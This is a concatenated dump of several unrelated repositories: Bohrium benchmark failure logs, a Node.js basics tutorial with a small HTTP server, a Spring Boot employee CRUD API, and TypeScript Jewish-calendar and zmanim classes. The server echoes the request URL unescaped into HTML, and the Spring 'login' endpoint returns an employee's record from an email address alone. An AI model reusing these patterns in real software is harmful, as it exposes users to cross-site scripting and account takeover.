IndexError: index 100 is out of bounds for axis 2 with size 100
Error in [node:impl]: /home/bhbuilder/.local/lib/libbh_vem_node.so: cannot open shared object file: No such file or directory
Run 02
~~~~~~
stdout::
N/A
stderr::
Traceback (most recent call last):
File "benchmark/python/convolve_3d.py", line 59, in <module>
main()
File "benchmark/python/convolve_3d.py", line 50, in main
image, image_filter = convolve_3d_init(N, B)
File "benchmark/python/convolve_3d.py", line 33, in convolve_3d_init
kernel = gen_3d_filter(fsize, 13.0)
File "benchmark/python/convolve_3d.py", line 23, in gen_3d_filter
kernel[filterZ + kernelrad, filterY + kernelrad,filterX + kernelrad] = caleuler * np.exp(-distance)
IndexError: index 100 is out of bounds for axis 2 with size 100
Error in [node:impl]: /home/bhbuilder/.local/lib/libbh_vem_node.so: cannot open shared object file: No such file or directory
<file_sep>/README.md
Find the result of the test suite run here: https://bitbucket.org/bohrium/bohrium-by-night/src/master/test/numpytest.py.rst
Find the result of the benchmark suite run here: https://bitbucket.org/bohrium/bohrium-by-night/src/master/benchmark/daily.py.rst<file_sep>/test/numpytest.py.rst
Python Test Suite
=================
Running suites/numpytest.py on Octuplets
commit: `#369b33555f0b3b45fc0dde490cf2f7340b51843f <https://bitbucket.org/bohrium/bohrium/commits/369b33555f0b3b45fc0dde490cf2f7340b51843f>`_,
time: 2015-04-19 04:02:50.415690.
The CPU results::
python: can't open file 'test/numpy/numpytest.py': [Errno 2] No such file or directory
The GPU results::
python: can't open file 'test/numpy/numpytest.py': [Errno 2] No such file or directory
<file_sep>/benchmark/raw_output/mc-NumPy-cpu.rst
Raw Benchmark Output
====================
Running Monte Carlo Pi on Octuplets using NumPy/CPU
commit: `#369b33555f0b3b45fc0dde490cf2f7340b51843f <https://bitbucket.org/bohrium/bohrium/commits/369b33555f0b3b45fc0dde490cf2f7340b51843f>`_,
time: 2015-04-19 04:05:42.450102.
command: ``/usr/bin/time -v -o /home/bhbuilder/benchpress/bh-job-b8c9e279-5d11-43bc-bce0-0731e86cf55b.sh-2.time python benchmark/python/mc.py --size=10000000*100 --bohrium=False``
Run 00
~~~~~~
stdout::
N/A
stderr::
Error in [node:impl]: /home/bhbuilder/.local/lib/libbh_vem_node.so: cannot open shared object file: No such file or directory
Run 01
~~~~~~
stdout::
N/A
stderr::
Error in [node:impl]: /home/bhbuilder/.local/lib/libbh_vem_node.so: cannot open shared object file: No such file or directory
Run 02
~~~~~~
stdout::
N/A
stderr::
Error in [node:impl]: /home/bhbuilder/.local/lib/libbh_vem_node.so: cannot open shared object file: No such file or directory
|
69b3cd087c03f512574c5ad2ebc03f1a56df36b1
|
[
"Markdown",
"Python",
"reStructuredText"
] | 9
|
reStructuredText
|
bh107/bohrium-by-night
|
cd5fc8c7c68377b1c64a2a0c88b14b2869d1a34e
|
15d51fa966428aa375619716a34d95de6c0505aa
|
refs/heads/master
|
<repo_name>OSU-CS290-Sp18/node-basics<file_sep>/circumference.js
function circumference(r) {
return Math.PI * 2 * r;
}
module.exports = circumference;
<file_sep>/test.js
console.log("== Hello world");
process.argv.forEach(function (arg, i) {
console.log("== The " + i + "'th argument is:", arg);
});
console.log("== process.env.SOME_ENV_VARIABLE:", process.env.SOME_ENV_VARIABLE);
console.log("== __filename:", __filename);
console.log("== __dirname:", __dirname);
var fs = require('fs');
// fs.readFile(...);
var circumference = require('./circumference');
console.log("== circumference(5):", circumference(5));
console.log("== circumference(8):", circumference(8));
var circle = require('./lib/circle');
console.log("== circle.circumference(5):", circle.circumference(5));
console.log("== circle.area(5):", circle.area(5));
var figlet = require('figlet');
figlet("CS 290!!", function (err, data) {
if (!err) {
console.log(data);
}
});
<file_sep>/server.js
var http = require('http');
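// Serve a tiny inline stylesheet for /style.css and a simple HTML page for every other URL.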
function requestHandler(req, res) {
console.log("== Got a request");
console.log(" -- method:", req.method);
console.log(" -- url:", req.url);
res.statusCode = 200;
if (req.url === '/style.css') {
res.setHeader('Content-Type', 'text/css');
res.write('body { font-family: Helvetica; }');
} else {
res.setHeader('Content-Type', 'text/html');
res.write('<html>');
res.write('<head>');
res.write('<link rel="stylesheet" href="style.css">');
res.write('</head>');
res.write('<body>');
res.write('<h1>Hello world!!!!!!</h1>');
res.write('<p>You requested this URL:' + req.url + '</p>');
res.write('</body>');
res.write('</html>');
}
res.end();
}
var server = http.createServer(requestHandler);
server.listen(3001, function () {
console.log("== Server is listening on port 3001");
});
|
54ac25c24f3e9c74e6a6bd13269f47412bf9528b
|
[
"JavaScript"
] | 3
|
JavaScript
|
OSU-CS290-Sp18/node-basics
|
1a3a71de03819d42629d3912cb61e57c697b6089
|
e040af607aa8e9a1f0b9ea6cb3288b675aaf469b
|
refs/heads/master
|
<file_sep>#Wed Jan 20 10:23:59 IST 2021
org.eclipse.core.runtime=2
org.eclipse.platform=4.13.0.v20190916-1045
<file_sep>package net.javaguides.NGPTracker.repository;
import org.springframework.data.jpa.repository.JpaRepository;
import org.springframework.stereotype.Repository;
import net.javaguides.NGPTracker.model.Employee;
@Repository
public interface EmployeeRepository extends JpaRepository<Employee, Long>{
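// Derived query: Spring Data generates the lookup by the emailId column from the method name.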
public Employee findByEmailId(String email);
}
<file_sep>package net.javaguides.NGPTracker.controller;
import java.util.HashMap;
import java.util.List;
import java.util.Map;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.http.ResponseEntity;
import org.springframework.web.bind.annotation.CrossOrigin;
import org.springframework.web.bind.annotation.DeleteMapping;
import org.springframework.web.bind.annotation.GetMapping;
import org.springframework.web.bind.annotation.PathVariable;
import org.springframework.web.bind.annotation.PostMapping;
import org.springframework.web.bind.annotation.PutMapping;
import org.springframework.web.bind.annotation.RequestBody;
import org.springframework.web.bind.annotation.RequestMapping;
//import org.springframework.web.bind.annotation.RequestMethod;
import org.springframework.web.bind.annotation.RestController;
import net.javaguides.NGPTracker.exceptions.ResourcesNotFoundException;
import net.javaguides.NGPTracker.model.Employee;
import net.javaguides.NGPTracker.repository.EmployeeRepository;
@RestController
@RequestMapping("/api/v1/")
//@RequestMapping(value = "/api/v1/", method = {RequestMethod.GET, RequestMethod.POST})
public class EmployeeController {
@Autowired
private EmployeeRepository employeeRepository;
//to find the email id exist or not
//get all list of employee
@CrossOrigin(origins="http://localhost:4200")
@GetMapping("/employees")
public List<Employee> getAllEmployees() {
return employeeRepository.findAll();
}
// create employee rest api
@CrossOrigin(origins="http://localhost:4200")
@PostMapping("/employees")
public Employee createEmployee(@RequestBody Employee employee) {
String tempEmailId = employee.getEmailId();
Employee employeeEmail = employeeRepository.findByEmailId(tempEmailId);
if(employeeEmail !=null) {
throw new ResourcesNotFoundException(" The emailid :"+ tempEmailId+" is already exist");
}
return employeeRepository.save(employee);
}
//get employee by id rest api
@CrossOrigin(origins="http://localhost:4200")
@GetMapping("/employees/{id}")
public ResponseEntity<Employee> getEmployeeById(@PathVariable Long id) {
Employee employee = employeeRepository.findById(id).orElseThrow(() -> new ResourcesNotFoundException("Employee does not exist with id: " + id));
return ResponseEntity.ok(employee);
}
//Update Rest api
@CrossOrigin(origins="http://localhost:4200")
@PutMapping("/employees/{id}")
public ResponseEntity<Employee> updateEmployee(@PathVariable Long id, @RequestBody Employee employeeDetails){
Employee employee = employeeRepository.findById(id).orElseThrow(() -> new ResourcesNotFoundException("Employee does not exist with id: " + id));
employee.setFirstName(employeeDetails.getFirstName());
employee.setLastName(employeeDetails.getLastName());
employee.setEmailId(employeeDetails.getEmailId());
Employee updatedEmployee = employeeRepository.save(employee);
return ResponseEntity.ok(updatedEmployee);
}
//Delete employee rest API
@DeleteMapping("/employees/{id}")
@CrossOrigin(origins="http://localhost:4200")
public ResponseEntity<Map<String, Boolean>> deleteEmployee(@PathVariable Long id){
Employee employee = employeeRepository.findById(id).orElseThrow(() -> new ResourcesNotFoundException("Employee does not exist with id: " + id));
employeeRepository.delete(employee);
Map<String, Boolean> response = new HashMap<>();
response.put("deleted", Boolean.TRUE);
return ResponseEntity.ok(response);
}
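//Login employee rest API (currently matches on email id only)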
@PostMapping("/employees/login")
@CrossOrigin(origins="http://localhost:4200")
public Employee loginEmployee(@RequestBody Employee employee) {
String tempEmailId = employee.getEmailId();
Employee employeeEmail = employeeRepository.findByEmailId(tempEmailId);
if(employeeEmail !=null) {
return employeeRepository.findByEmailId(tempEmailId);
}
throw new ResourcesNotFoundException(" The emailid :"+ tempEmailId+" is doesn't exist");
}
}
|
d8d57c6ce932a2c806d860492de32462fee5106d
|
[
"Java",
"INI"
] | 3
|
INI
|
srayas/NGPTrackerBE
|
87f7d2d3b923d087f0786566fd68d331c199bba5
|
aff644a444875628d8b365056963ba2651fe345d
|
refs/heads/master
|
<repo_name>nadeemansaris524968/node-tests<file_sep>/utils/utils.test.js
const expect = require('expect');
const utils = require('./utils');
describe('Utils', () => {
describe('#add', () => {
it('should add two numbers', () => {
var result = utils.add(33, 11);
expect(result).toBe(44).toBeA('number');
});
});
it('should async add two numbers', (done) => {
utils.asyncAdd(4, 3, (sum) => {
expect(sum).toBe(7).toBeA('number');
done();
});
});
it('should square a number', (done) => {
utils.square(4, (squared) => {
expect(squared).toBe(16).toBeA('number');
done();
});
});
});
|
8d0057d75ef95e72ad3c1151d97ae6adfd871fbf
|
[
"JavaScript"
] | 1
|
JavaScript
|
nadeemansaris524968/node-tests
|
1ae9fd1236f755a1871eb8ea856fa1e82e1a046a
|
10ee7d9a1d59e110b14b127576d4ba80b3342542
|
refs/heads/master
|
<file_sep>import { DateTime } from 'luxon';
import { DateUtils, StringUtils, IntegerUtils } from '../polyfills/Utils';
/**
* Wrapper class for an astronomical time, mostly used to sort collections of
* astronomical times.
*
* @author © <NAME> 2007-2011
* @version 1.0
*/
export class Zman {
zmanLabel: string | null;
zman?: DateTime;
duration?: number;
zmanDescription?: Date;
constructor(date: DateTime, label: string | null)
constructor(duration: number, label: string | null)
constructor(dateOrDuration: number | DateTime, label: string | null) {
this.zmanLabel = label;
if (DateTime.isDateTime(dateOrDuration)) {
this.zman = dateOrDuration;
} else if (typeof dateOrDuration === 'number') {
this.duration = dateOrDuration;
}
}
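/** Compares two zmanim by their DateTime value; throws if either value is missing. */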
static compareDateOrder(zman1: Zman, zman2: Zman): number {
if (!zman1.zman || !zman2.zman) {
throw new RangeError('zman cannot be falsy when comparing');
}
return DateUtils.compareTo(zman1.zman, zman2.zman);
}
static compareNameOrder(zman1: Zman, zman2: Zman): number {
return StringUtils.compareTo(zman1.zmanLabel || '', zman2.zmanLabel || '');
}
static compareDurationOrder(zman1: Zman, zman2: Zman): number {
if (!zman1.duration || !zman2.duration) {
throw new RangeError('Duration cannot be falsy when comparing');
}
return IntegerUtils.compare(zman1.duration, zman2.duration);
}
}
export type ZmanWithZmanDate = Zman & { zman: DateTime };
export type ZmanWithDuration = Zman & { duration: number };
<file_sep>/**
* An Object representing a Daf in the Daf Yomi cycle.
*
* @author © <NAME> 2011 - 2019
*/
export class Daf {
private masechtaNumber: number;
private daf: number;
private static readonly masechtosBavliTransliterated: string[] = ['Berachos', 'Shabbos', 'Eruvin', 'Pesachim', 'Shekalim',
'Yoma', 'Sukkah', 'Beitzah', '<NAME>', 'Taanis', 'Megillah', '<NAME>atan', 'Chagigah', 'Yevamos',
'Kesubos', 'Nedarim', 'Nazir', 'Sotah', 'Gitin', 'Kiddushin', '<NAME>', '<NAME>', '<NAME>',
'Sanhedrin', 'Makkos', 'Shevuos', '<NAME>', 'Horiyos', 'Zevachim', 'Menachos', 'Chullin', 'Bechoros',
'Arachin', 'Temurah', 'Kerisos', 'Meilah', 'Kinnim', 'Tamid', 'Midos', 'Niddah'];
private static readonly masechtosBavli: string[] = ['\u05D1\u05E8\u05DB\u05D5\u05EA', '\u05E9\u05D1\u05EA',
'\u05E2\u05D9\u05E8\u05D5\u05D1\u05D9\u05DF', '\u05E4\u05E1\u05D7\u05D9\u05DD',
'\u05E9\u05E7\u05DC\u05D9\u05DD', '\u05D9\u05D5\u05DE\u05D0', '\u05E1\u05D5\u05DB\u05D4',
'\u05D1\u05D9\u05E6\u05D4', '\u05E8\u05D0\u05E9 \u05D4\u05E9\u05E0\u05D4',
'\u05EA\u05E2\u05E0\u05D9\u05EA', '\u05DE\u05D2\u05D9\u05DC\u05D4',
'\u05DE\u05D5\u05E2\u05D3 \u05E7\u05D8\u05DF', '\u05D7\u05D2\u05D9\u05D2\u05D4',
'\u05D9\u05D1\u05DE\u05D5\u05EA', '\u05DB\u05EA\u05D5\u05D1\u05D5\u05EA', '\u05E0\u05D3\u05E8\u05D9\u05DD',
'\u05E0\u05D6\u05D9\u05E8', '\u05E1\u05D5\u05D8\u05D4', '\u05D2\u05D9\u05D8\u05D9\u05DF',
'\u05E7\u05D9\u05D3\u05D5\u05E9\u05D9\u05DF', '\u05D1\u05D1\u05D0 \u05E7\u05DE\u05D0',
'\u05D1\u05D1\u05D0 \u05DE\u05E6\u05D9\u05E2\u05D0', '\u05D1\u05D1\u05D0 \u05D1\u05EA\u05E8\u05D0',
'\u05E1\u05E0\u05D4\u05D3\u05E8\u05D9\u05DF', '\u05DE\u05DB\u05D5\u05EA',
'\u05E9\u05D1\u05D5\u05E2\u05D5\u05EA', '\u05E2\u05D1\u05D5\u05D3\u05D4 \u05D6\u05E8\u05D4',
'\u05D4\u05D5\u05E8\u05D9\u05D5\u05EA', '\u05D6\u05D1\u05D7\u05D9\u05DD', '\u05DE\u05E0\u05D7\u05D5\u05EA',
'\u05D7\u05D5\u05DC\u05D9\u05DF', '\u05D1\u05DB\u05D5\u05E8\u05D5\u05EA', '\u05E2\u05E8\u05DB\u05D9\u05DF',
'\u05EA\u05DE\u05D5\u05E8\u05D4', '\u05DB\u05E8\u05D9\u05EA\u05D5\u05EA', '\u05DE\u05E2\u05D9\u05DC\u05D4',
'\u05E7\u05D9\u05E0\u05D9\u05DD', '\u05EA\u05DE\u05D9\u05D3', '\u05DE\u05D9\u05D3\u05D5\u05EA',
'\u05E0\u05D3\u05D4'];
private static readonly masechtosYerushalmiTransliterated: string[] = ['Berachos', 'Pe\'ah', 'Demai', 'Kilayim', 'Shevi\'is',
'Terumos', 'Ma\'asros', '<NAME>', 'Chalah', 'Orlah', 'Bikurim', 'Shabbos', 'Eruvin', 'Pesachim',
'Beitzah', '<NAME>', 'Yoma', 'Sukah', 'Ta\'anis', 'Shekalim', 'Megilah', 'Chagigah', 'Mo<NAME>atan',
'Yevamos', 'Kesuvos', 'Sotah', 'Nedarim', 'Nazir', 'Gitin', 'Kidushin', 'Bava Kama', 'Bava Metzia',
'<NAME>', 'Sanhedrin', 'Makos', 'Shevuos', '<NAME>', 'Horayos', 'Nidah', 'No Daf Today'];
private static readonly masechtosYerushlmi: string[] = ['\u05d1\u05e8\u05db\u05d5\u05ea', '\u05e4\u05d9\u05d0\u05d4',
'\u05d3\u05de\u05d0\u05d9', '\u05db\u05dc\u05d0\u05d9\u05d9\u05dd', '\u05e9\u05d1\u05d9\u05e2\u05d9\u05ea',
'\u05ea\u05e8\u05d5\u05de\u05d5\u05ea', '\u05de\u05e2\u05e9\u05e8\u05d5\u05ea', '\u05de\u05e2\u05e9\u05e8 \u05e9\u05e0\u05d9',
'\u05d7\u05dc\u05d4', '\u05e2\u05d5\u05e8\u05dc\u05d4', '\u05d1\u05d9\u05db\u05d5\u05e8\u05d9\u05dd',
'\u05e9\u05d1\u05ea', '\u05e2\u05d9\u05e8\u05d5\u05d1\u05d9\u05df', '\u05e4\u05e1\u05d7\u05d9\u05dd',
'\u05d1\u05d9\u05e6\u05d4', '\u05e8\u05d0\u05e9 \u05d4\u05e9\u05e0\u05d4', '\u05d9\u05d5\u05de\u05d0',
'\u05e1\u05d5\u05db\u05d4', '\u05ea\u05e2\u05e0\u05d9\u05ea', '\u05e9\u05e7\u05dc\u05d9\u05dd', '\u05de\u05d2\u05d9\u05dc\u05d4',
'\u05d7\u05d2\u05d9\u05d2\u05d4', '\u05de\u05d5\u05e2\u05d3 \u05e7\u05d8\u05df', '\u05d9\u05d1\u05de\u05d5\u05ea',
'\u05db\u05ea\u05d5\u05d1\u05d5\u05ea', '\u05e1\u05d5\u05d8\u05d4', '\u05e0\u05d3\u05e8\u05d9\u05dd', '\u05e0\u05d6\u05d9\u05e8',
'\u05d2\u05d9\u05d8\u05d9\u05df', '\u05e7\u05d9\u05d3\u05d5\u05e9\u05d9\u05df', '\u05d1\u05d1\u05d0 \u05e7\u05de\u05d0',
'\u05d1\u05d1\u05d0 \u05de\u05e6\u05d9\u05e2\u05d0', '\u05d1\u05d1\u05d0 \u05d1\u05ea\u05e8\u05d0',
'\u05e9\u05d1\u05d5\u05e2\u05d5\u05ea', '\u05de\u05db\u05d5\u05ea', '\u05e1\u05e0\u05d4\u05d3\u05e8\u05d9\u05df',
'\u05e2\u05d1\u05d5\u05d3\u05d4 \u05d6\u05e8\u05d4', '\u05d4\u05d5\u05e8\u05d9\u05d5\u05ea', '\u05e0\u05d9\u05d3\u05d4',
'\u05d0\u05d9\u05df \u05d3\u05e3 \u05d4\u05d9\u05d5\u05dd'];
/**
* @return the masechtaNumber
*/
public getMasechtaNumber(): number {
return this.masechtaNumber;
}
/**
* Set the masechta number in the order of the Daf Yomi. The sequence is: Berachos, Shabbos, Eruvin, Pesachim,
* Shekalim, Yoma, Sukkah, Beitzah, Rosh Hashana, Taanis, Megillah, Moed Katan, Chagigah, Yevamos, Kesubos, Nedarim,
* Nazir, Sotah, Gitin, Kiddushin, Bava Kamma, Bava Metzia, Bava Basra, Sanhedrin, Makkos, Shevuos, Avodah Zarah,
* Horiyos, Zevachim, Menachos, Chullin, Bechoros, Arachin, Temurah, Kerisos, Meilah, Kinnim, Tamid, Midos and
* Niddah.
*
* @param masechtaNumber
* the masechtaNumber in the order of the Daf Yomi to set
*/
public setMasechtaNumber(masechtaNumber: number): void {
this.masechtaNumber = masechtaNumber;
}
/**
* Constructor that creates a Daf setting the {@link #setMasechtaNumber(int) masechta Number} and
* {@link #setDaf(int) daf Number}
*
* @param masechtaNumber the masechtaNumber in the order of the Daf Yomi to set
* @param daf the daf (page) number to set
*/
constructor(masechtaNumber: number, daf: number) {
this.masechtaNumber = masechtaNumber;
this.daf = daf;
}
/**
* Returns the daf (page number) of the Daf Yomi
* @return the daf (page number) of the Daf Yomi
*/
public getDaf(): number {
return this.daf;
}
/**
* Sets the daf (page number) of the Daf Yomi
* @param daf the daf (page) number
*/
public setDaf(daf: number): void {
this.daf = daf;
}
/**
* Returns the transliterated name of the masechta (tractate) of the Daf Yomi. The list of mashechtos is: Berachos,
* Shabbos, Eruvin, Pesachim, Shekalim, Yoma, Sukkah, Beitzah, Rosh Hashana, Taanis, Megillah, Moed Katan, Chagigah,
* Yevamos, Kesubos, Nedarim, Nazir, Sotah, Gitin, Kiddushin, Bava Kamma, Bava Metzia, Bava Basra, Sanhedrin,
* Makkos, Shevuos, Avodah Zarah, Horiyos, Zevachim, Menachos, Chullin, Bechoros, Arachin, Temurah, Kerisos, Meilah,
* Kinnim, Tamid, Midos and Niddah.
*
* @return the transliterated name of the masechta (tractate) of the Daf Yomi such as Berachos.
*/
public getMasechtaTransliterated(): string {
return Daf.masechtosBavliTransliterated[this.masechtaNumber];
}
/**
* Returns the masechta (tractate) of the Daf Yomi in Hebrew, It will return
* ברכות for Berachos.
*
* @return the masechta (tractate) of the Daf Yomi in Hebrew, It will return
* ברכות for Berachos.
*/
public getMasechta(): string {
return Daf.masechtosBavli[this.masechtaNumber];
}
/**
* Returns the transliterated name of the masechta (tractate) of the Daf Yomi in Yerushalmi. The list of mashechtos
* is: Berachos, Pe'ah, Demai, Kilayim, Shevi'is, Terumos, Ma'asros, Ma'aser Sheni, Chalah, Orlah, Bikurim, Shabbos,
* Eruvin, Pesachim, Beitzah, <NAME>ah, Yoma, Sukah, Ta'anis, Shekalim, Megilah, Chagigah, Moed Katan, Yevamos,
* Kesuvos, Sotah, Nedarim, Nazir, Gitin, Kidushin, Bava Kama, Bava Metzia, Bava Basra, Sanhedrin, Makos, Shevuos,
* Avodah Zarah, Horayos, And Nidah .
*
* @return the transliterated name of the masechta (tractate) of the Daf Yomi such as Berachos.
*/
public getYerushlmiMasechtaTransliterated(): string {
return Daf.masechtosYerushalmiTransliterated[this.masechtaNumber];
}
/**
* Returns the Yerushlmi masechta (tractate) of the Daf Yomi in Hebrew, It will return
* ברכות for Berachos.
*
* @return the Yerushalmi masechta (tractate) of the Daf Yomi in Hebrew, It will return
* ברכות for Berachos.
*/
public getYerushalmiMasechta(): string {
return Daf.masechtosYerushlmi[this.masechtaNumber];
}
}
<file_sep>import { DateTime } from 'luxon';
import { GeoLocation } from '../util/GeoLocation';
import { Daf } from './Daf';
import { JewishDate } from './JewishDate';
import { Calendar } from '../polyfills/Utils';
const { MONDAY, TUESDAY, THURSDAY, FRIDAY, SATURDAY } = Calendar;
/**
* Note that despite there being a Vezos Habracha value, this is for consistency, and this is not currently used
*
*/
export enum Parsha {
NONE, BERESHIS, NOACH, LECH_LECHA, VAYERA, CHAYEI_SARA, TOLDOS, VAYETZEI,
VAYISHLACH, VAYESHEV, MIKETZ, VAYIGASH, VAYECHI, SHEMOS, VAERA, BO,
BESHALACH, YISRO, MISHPATIM, TERUMAH, TETZAVEH, KI_SISA, VAYAKHEL,
PEKUDEI, VAYIKRA, TZAV, SHMINI, TAZRIA, METZORA, ACHREI_MOS, KEDOSHIM,
EMOR, BEHAR, BECHUKOSAI, BAMIDBAR, NASSO, BEHAALOSCHA, SHLACH, KORACH,
CHUKAS, BALAK, PINCHAS, MATOS, MASEI, DEVARIM, VAESCHANAN, EIKEV,
REEH, SHOFTIM, KI_SEITZEI, KI_SAVO, NITZAVIM, VAYEILECH, HAAZINU,
VZOS_HABERACHA, VAYAKHEL_PEKUDEI, TAZRIA_METZORA, ACHREI_MOS_KEDOSHIM, BEHAR_BECHUKOSAI,
CHUKAS_BALAK, MATOS_MASEI, NITZAVIM_VAYEILECH, SHKALIM, ZACHOR, PARA, HACHODESH,
}
/**
* The JewishCalendar extends the JewishDate class and adds calendar methods.
*
* This open source Java code was originally ported by <a href="http://www.facebook.com/avromf"><NAME></a>
* from his C++ code. It was refactored to fit the KosherJava Zmanim API with simplification of the code, enhancements
* and some bug fixing. The class allows setting whether the holiday and parsha scheme follows the Israel scheme or outside Israel
* scheme. The default is the outside Israel scheme.
* The parsha code was ported by <NAME> from his <a href="https://github.com/yparitcher/libzmanim">libzmanim</a> code.
*
* TODO: Some do not belong in this class, but here is a partial list of what should still be implemented in some form:
* <ol>
* <li>Add Isru Chag</li>
* <li>Mishna yomis etc</li>
* </ol>
*
* @see java.util.Date
* @see java.util.Calendar
* @author © <NAME> 2019
* @author © <NAME> 2002
* @author © <NAME> 2011 - 2019
*/
export class JewishCalendar extends JewishDate {
public static readonly EREV_PESACH: number = 0;
public static readonly PESACH: number = 1;
public static readonly CHOL_HAMOED_PESACH: number = 2;
public static readonly PESACH_SHENI: number = 3;
public static readonly EREV_SHAVUOS: number = 4;
public static readonly SHAVUOS: number = 5;
public static readonly SEVENTEEN_OF_TAMMUZ: number = 6;
public static readonly TISHA_BEAV: number = 7;
public static readonly TU_BEAV: number = 8;
public static readonly EREV_ROSH_HASHANA: number = 9;
public static readonly ROSH_HASHANA: number = 10;
public static readonly FAST_OF_GEDALYAH: number = 11;
public static readonly EREV_YOM_KIPPUR: number = 12;
public static readonly YOM_KIPPUR: number = 13;
public static readonly EREV_SUCCOS: number = 14;
public static readonly SUCCOS: number = 15;
public static readonly CHOL_HAMOED_SUCCOS: number = 16;
public static readonly HOSHANA_RABBA: number = 17;
public static readonly SHEMINI_ATZERES: number = 18;
public static readonly SIMCHAS_TORAH: number = 19;
// public static final int EREV_CHANUKAH = 20;// probably remove this
public static readonly CHANUKAH: number = 21;
public static readonly TENTH_OF_TEVES: number = 22;
public static readonly TU_BESHVAT: number = 23;
public static readonly FAST_OF_ESTHER: number = 24;
public static readonly PURIM: number = 25;
public static readonly SHUSHAN_PURIM: number = 26;
public static readonly PURIM_KATAN: number = 27;
public static readonly ROSH_CHODESH: number = 28;
public static readonly YOM_HASHOAH: number = 29;
public static readonly YOM_HAZIKARON: number = 30;
public static readonly YOM_HAATZMAUT: number = 31;
public static readonly YOM_YERUSHALAYIM: number = 32;
private inIsrael: boolean = false;
private useModernHolidays: boolean = false;
public static readonly parshalist: Parsha[][] = [
[Parsha.NONE, Parsha.VAYEILECH, Parsha.HAAZINU, Parsha.NONE, Parsha.BERESHIS, Parsha.NOACH, Parsha.LECH_LECHA, Parsha.VAYERA, Parsha.CHAYEI_SARA, Parsha.TOLDOS, Parsha.VAYETZEI, Parsha.VAYISHLACH, Parsha.VAYESHEV, Parsha.MIKETZ, Parsha.VAYIGASH, Parsha.VAYECHI, Parsha.SHEMOS, Parsha.VAERA, Parsha.BO, Parsha.BESHALACH, Parsha.YISRO, Parsha.MISHPATIM, Parsha.TERUMAH, Parsha.TETZAVEH, Parsha.KI_SISA, Parsha.VAYAKHEL_PEKUDEI, Parsha.VAYIKRA, Parsha.TZAV, Parsha.NONE, Parsha.SHMINI, Parsha.TAZRIA_METZORA, Parsha.ACHREI_MOS_KEDOSHIM, Parsha.EMOR, Parsha.BEHAR_BECHUKOSAI, Parsha.BAMIDBAR, Parsha.NASSO, Parsha.BEHAALOSCHA, Parsha.SHLACH, Parsha.KORACH, Parsha.CHUKAS, Parsha.BALAK, Parsha.PINCHAS, Parsha.MATOS_MASEI, Parsha.DEVARIM, Parsha.VAESCHANAN, Parsha.EIKEV, Parsha.REEH, Parsha.SHOFTIM, Parsha.KI_SEITZEI, Parsha.KI_SAVO, Parsha.NITZAVIM_VAYEILECH],
[Parsha.NONE, Parsha.VAYEILECH, Parsha.HAAZINU, Parsha.NONE, Parsha.BERESHIS, Parsha.NOACH, Parsha.LECH_LECHA, Parsha.VAYERA, Parsha.CHAYEI_SARA, Parsha.TOLDOS, Parsha.VAYETZEI, Parsha.VAYISHLACH, Parsha.VAYESHEV, Parsha.MIKETZ, Parsha.VAYIGASH, Parsha.VAYECHI, Parsha.SHEMOS, Parsha.VAERA, Parsha.BO, Parsha.BESHALACH, Parsha.YISRO, Parsha.MISHPATIM, Parsha.TERUMAH, Parsha.TETZAVEH, Parsha.KI_SISA, Parsha.VAYAKHEL_PEKUDEI, Parsha.VAYIKRA, Parsha.TZAV, Parsha.NONE, Parsha.SHMINI, Parsha.TAZRIA_METZORA, Parsha.ACHREI_MOS_KEDOSHIM, Parsha.EMOR, Parsha.BEHAR_BECHUKOSAI, Parsha.BAMIDBAR, Parsha.NONE, Parsha.NASSO, Parsha.BEHAALOSCHA, Parsha.SHLACH, Parsha.KORACH, Parsha.CHUKAS_BALAK, Parsha.PINCHAS, Parsha.MATOS_MASEI, Parsha.DEVARIM, Parsha.VAESCHANAN, Parsha.EIKEV, Parsha.REEH, Parsha.SHOFTIM, Parsha.KI_SEITZEI, Parsha.KI_SAVO, Parsha.NITZAVIM_VAYEILECH],
[Parsha.NONE, Parsha.HAAZINU, Parsha.NONE, Parsha.NONE, Parsha.BERESHIS, Parsha.NOACH, Parsha.LECH_LECHA, Parsha.VAYERA, Parsha.CHAYEI_SARA, Parsha.TOLDOS, Parsha.VAYETZEI, Parsha.VAYISHLACH, Parsha.VAYESHEV, Parsha.MIKETZ, Parsha.VAYIGASH, Parsha.VAYECHI, Parsha.SHEMOS, Parsha.VAERA, Parsha.BO, Parsha.BESHALACH, Parsha.YISRO, Parsha.MISHPATIM, Parsha.TERUMAH, Parsha.TETZAVEH, Parsha.KI_SISA, Parsha.VAYAKHEL_PEKUDEI, Parsha.VAYIKRA, Parsha.TZAV, Parsha.NONE, Parsha.NONE, Parsha.SHMINI, Parsha.TAZRIA_METZORA, Parsha.ACHREI_MOS_KEDOSHIM, Parsha.EMOR, Parsha.BEHAR_BECHUKOSAI, Parsha.BAMIDBAR, Parsha.NASSO, Parsha.BEHAALOSCHA, Parsha.SHLACH, Parsha.KORACH, Parsha.CHUKAS, Parsha.BALAK, Parsha.PINCHAS, Parsha.MATOS_MASEI, Parsha.DEVARIM, Parsha.VAESCHANAN, Parsha.EIKEV, Parsha.REEH, Parsha.SHOFTIM, Parsha.KI_SEITZEI, Parsha.KI_SAVO, Parsha.NITZAVIM],
[Parsha.NONE, Parsha.HAAZINU, Parsha.NONE, Parsha.NONE, Parsha.BERESHIS, Parsha.NOACH, Parsha.LECH_LECHA, Parsha.VAYERA, Parsha.CHAYEI_SARA, Parsha.TOLDOS, Parsha.VAYETZEI, Parsha.VAYISHLACH, Parsha.VAYESHEV, Parsha.MIKETZ, Parsha.VAYIGASH, Parsha.VAYECHI, Parsha.SHEMOS, Parsha.VAERA, Parsha.BO, Parsha.BESHALACH, Parsha.YISRO, Parsha.MISHPATIM, Parsha.TERUMAH, Parsha.TETZAVEH, Parsha.KI_SISA, Parsha.VAYAKHEL, Parsha.PEKUDEI, Parsha.VAYIKRA, Parsha.TZAV, Parsha.NONE, Parsha.SHMINI, Parsha.TAZRIA_METZORA, Parsha.ACHREI_MOS_KEDOSHIM, Parsha.EMOR, Parsha.BEHAR_BECHUKOSAI, Parsha.BAMIDBAR, Parsha.NASSO, Parsha.BEHAALOSCHA, Parsha.SHLACH, Parsha.KORACH, Parsha.CHUKAS, Parsha.BALAK, Parsha.PINCHAS, Parsha.MATOS_MASEI, Parsha.DEVARIM, Parsha.VAESCHANAN, Parsha.EIKEV, Parsha.REEH, Parsha.SHOFTIM, Parsha.KI_SEITZEI, Parsha.KI_SAVO, Parsha.NITZAVIM],
